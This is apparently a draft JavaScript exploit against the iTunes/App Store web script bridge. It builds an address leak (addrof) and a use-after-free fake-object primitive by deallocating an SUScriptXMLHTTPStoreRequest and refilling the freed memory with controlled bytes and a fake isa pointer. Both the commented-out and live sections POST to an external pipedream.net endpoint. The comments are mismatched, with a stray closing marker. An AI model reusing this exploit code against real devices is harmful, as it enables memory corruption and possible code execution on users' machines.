// var i;

function addrof(obj) {
	const saved = iTunes.scriptWindowContext();
	iTunes.setScriptWindowContext_(obj);
	try {
		iTunes.window;
	} catch(e) {
		const match = /instance (0x[\da-f]+)$/i.exec(e);
		if (match)
			return match[1];
		throw new Error('Unable to leak addr');
	} finally {
		iTunes.setScriptWindowContext_(saved);
	}
}
	
function fakeobj(size, data, isa) {
	var total_size = size + 4, isa_string = isa.toString();

	// alloc an SUScriptXMLHTTPStoreRequest
	const w = iTunes.makeXMLHTTPStoreRequest();
	const req = iTunes.createFacebookRequest('http://', 'GET');
	// malloc_size(SUScriptXMLHTTPStoreRequest) == total_size
	const uri = str2DataUri(makeStr(total_size));
	// avoid GC
	window.w = w;
	window.req = req;
	// get a dangling pointer
	w.dealloc();
	for (i = 0; i < total_size + 4; i++) {
		if (i >= size) {
			req.addMultiPartData(uri, parseInt(isa_string[i - size] + isa_string[i - size + 1]), 'B');
			i++;
		}
		else
			req.addMultiPartData(uri, data[i], 'B');
	}
	// If this doesn't work, try w();, w, xhttp.send(w), return w, and/or w().
	return w;
}

const a = [];
for (i = 0; i < 32; i++)
	a[i] = 'A';
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "https://5381de4c031642a344fea58b89f511ba.m.pipedream.net", true);
xhttp.send(fakeobj(192, a, 0x41414141));
*/

// alloc an SUScriptXMLHTTPStoreRequest
const w = iTunes.makeXMLHTTPStoreRequest();
const req = iTunes.createFacebookRequest('http://', 'GET'); // malloc_size(SUScriptXMLHTTPStoreRequest) == 192
const uri = str2DataUri(makeStr(192));
// avoid GC
window.w = w;
window.req = req;
w.dealloc(); // get a dangling pointer
for (let i = 0; i < 32; i++) // reclaim the memory
	req.addMultiPartData(uri, 'A', 'B'); // only the first arg matters
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "https://5381de4c031642a344fea58b89f511ba.m.pipedream.net", true);
xhttp.send(0);